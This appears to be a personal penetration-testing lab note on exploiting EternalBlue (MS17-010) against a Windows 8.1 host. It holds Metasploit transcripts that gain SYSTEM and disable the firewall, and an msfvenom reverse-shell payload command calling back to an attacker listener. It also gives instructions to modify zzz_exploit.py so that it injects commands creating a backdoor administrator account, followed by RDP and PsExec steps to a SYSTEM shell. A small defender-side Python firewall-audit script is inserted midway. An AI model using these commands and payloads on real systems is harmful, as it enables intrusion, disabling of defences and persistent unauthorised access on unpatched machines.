EternalBlue ms17-010 Firewall disble
I disabled firewall:
[*] 10.11.1.75:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall show currentprofile
COMMAND => netsh advfirewall show currentprofile
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 10.11.1.75:445 - Target OS: Windows 8.1 Enterprise 9600
[*] 10.11.1.75:445 - Built a write-what-where primitive...
[+] 10.11.1.75:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.11.1.75:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.11.1.75:445 - checking if the file is unlocked
[*] 10.11.1.75:445 - Getting the command output...
[*] 10.11.1.75:445 - Executing cleanup...
[+] 10.11.1.75:445 - Cleanup was successful
[+] 10.11.1.75:445 - Command completed successfully!
[*] 10.11.1.75:445 - Output for "netsh advfirewall show currentprofile":
Public Profile Settings:
----------------------------------------------------------------------
State ON
Firewall Policy AllowInbound,BlockOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Disable
RemoteManagement Disable
UnicastResponseToMulticast Enable
Logging:
LogAllowedConnections Disable
LogDroppedConnections Disable
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize 4096
Ok.
[*] 10.11.1.75:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND NetSh Advfirewall set allprofiles state off
COMMAND => NetSh Advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 10.11.1.75:445 - Target OS: Windows 8.1 Enterprise 9600
[*] 10.11.1.75:445 - Built a write-what-where primitive...
[+] 10.11.1.75:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.11.1.75:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.11.1.75:445 - checking if the file is unlocked
[*] 10.11.1.75:445 - Getting the command output...
[*] 10.11.1.75:445 - Executing cleanup...
[+] 10.11.1.75:445 - Cleanup was successful
[+] 10.11.1.75:445 - Command completed successfully!
[*] 10.11.1.75:445 - Output for "NetSh Advfirewall set allprofiles state off":
Ok.
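An added defender-side check, not part of this gist: a small Python parser for the `netsh advfirewall show currentprofile` dump format shown above, plus an audit that flags a profile whose State is not ON, whose inbound default is not Block, or whose dropped-connection logging is off. The two sample dumps are constructed from the transcript values (the second one is what the profile looks like after the state has been set to off).

```python
import re
from typing import Dict, List

# Constructed sample in the layout netsh prints (columns aligned with spaces);
# values taken from the profile shown in the transcript above.
SAMPLE_ON = (
    "Public Profile Settings:\n"
    "----------------------------------------------------------------------\n"
    "State                                 ON\n"
    "Firewall Policy                       AllowInbound,BlockOutbound\n"
    "LocalFirewallRules                    N/A (GPO-store only)\n"
    "RemoteManagement                      Disable\n"
    "Logging:\n"
    "LogDroppedConnections                 Disable\n"
    "FileName                              %systemroot%\\system32\\LogFiles\\Firewall\\pfirewall.log\n"
    "MaxFileSize                           4096\n"
    "Ok.\n"
)

# Constructed: the same profile once the state has been switched off.
SAMPLE_OFF = re.sub(r"^(State\s+)ON$", r"\1OFF", SAMPLE_ON, flags=re.M)


def parse_profile(output: str) -> Dict[str, str]:
    """Turn the key/value lines of a netsh profile dump into a dict.
    Keys can contain a single space ("Firewall Policy") and values can too
    ("N/A (GPO-store only)"), so split on the first run of 2+ spaces."""
    settings: Dict[str, str] = {}
    for line in output.splitlines():
        line = line.rstrip()
        # Skip section headers, the dashed rule, the trailing "Ok." and blanks.
        if not line or line.endswith(":") or line.startswith("---") or line == "Ok.":
            continue
        parts = re.split(r"\s{2,}", line, maxsplit=1)
        if len(parts) == 2:
            settings[parts[0].strip()] = parts[1].strip()
    return settings


def audit_profile(settings: Dict[str, str]) -> List[str]:
    """Return the findings a defender would want raised for one profile."""
    findings: List[str] = []
    if settings.get("State", "").upper() != "ON":
        findings.append("firewall state is not ON")
    policy = settings.get("Firewall Policy", "")
    if "BlockInbound" not in policy:
        findings.append(f"inbound default is not Block (policy: {policy})")
    if settings.get("LogDroppedConnections", "").lower() != "enable":
        findings.append("dropped-connection logging is disabled")
    return findings
```

Run against the transcript's own profile this already raises two findings (inbound default is Allow, drop logging off) before the state is ever touched; the OFF sample adds the third.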
And then I used the below command:
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp lhost=192.168.119.xxx lport=1234 -e x64/xor -i 5 -f exe -o expSMB.exe
Try starting netlogon service if the above does not work.
Disable firewall without using metasploit:
||||
First you need to use the exploit Python script and modify it if you want to shut down the firewall. Next you will want to modify the code around the smb_pwn(conn, arch) function. You will see some comments that need to be uncommented and modified. This is where you will inject the netsh command and turn off the firewall. After injecting this command it will turn off the firewall and you will be able to get a reverse shell.
Command to Inject to Turn off Firewall: netsh advfirewall set allprofiles state off
The other method is to create a user and grant it Remote Desktop and Administrators group membership. Then you can log in over Remote Desktop. Disabling the firewall is the easiest method to get to the System user.
https://www.exploit-db.com/exploits/42315
//
So I scanned the machine-> instantly knew eternalblue
grabbed a copy of zzz_exploit.py modified the smb_pwn function to add a user in the administrator group
service_exec(conn, r'cmd /c net user bill pass /add')
service_exec(conn, r'cmd /c net localgroup administrators bill /add')
Then RDP'd in and just ran the command prompt as Administrator.
Disabled the firewall and enabled SMB.
Downloaded PsExec and spawned a SYSTEM shell: PsExec -i -s cmd.exe.
10 min